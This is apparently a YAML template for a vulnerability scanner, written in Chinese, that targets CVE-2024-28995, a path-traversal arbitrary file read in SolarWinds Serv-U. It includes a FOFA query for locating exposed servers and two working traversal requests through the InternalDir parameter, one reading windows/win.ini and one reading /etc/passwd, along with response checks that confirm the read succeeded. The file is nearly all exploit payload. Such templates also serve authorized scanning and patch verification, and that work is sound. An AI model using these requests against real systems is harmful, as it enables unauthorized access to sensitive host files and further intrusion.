product: Serv-U
vName: Serv-U InternalDir任意文件读取
type: 文件读取
vID:
  - CVE-2024-28995
  - CNNVD-202406-444
level: 3
vDesc: SolarWinds Serv-U File Server是美国SolarWinds公司的一款文件传输服务器。SolarWinds Serv-U存在路径遍历漏洞，该漏洞源于容易受到目录横向的影响，允许访问读取主机上的敏感文件。SolarWinds
  Serv-U 存在任意文件读取漏洞
version: ''
note: ''
search:
  FOFA: server="Serv-U"
protocol: http
link: https://mp.weixin.qq.com/s/O_jIIqMQkBt4dPSkFxThVg
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /?InternalDir=/../../../../windows&InternalFile=win.ini
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - for 16-bit app support
            logic: and
  - exp:
      method: get
      follow: false
      path: /?InternalDir=\..\..\..\..\etc&InternalFile=passwd
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 'root:'
            logic: and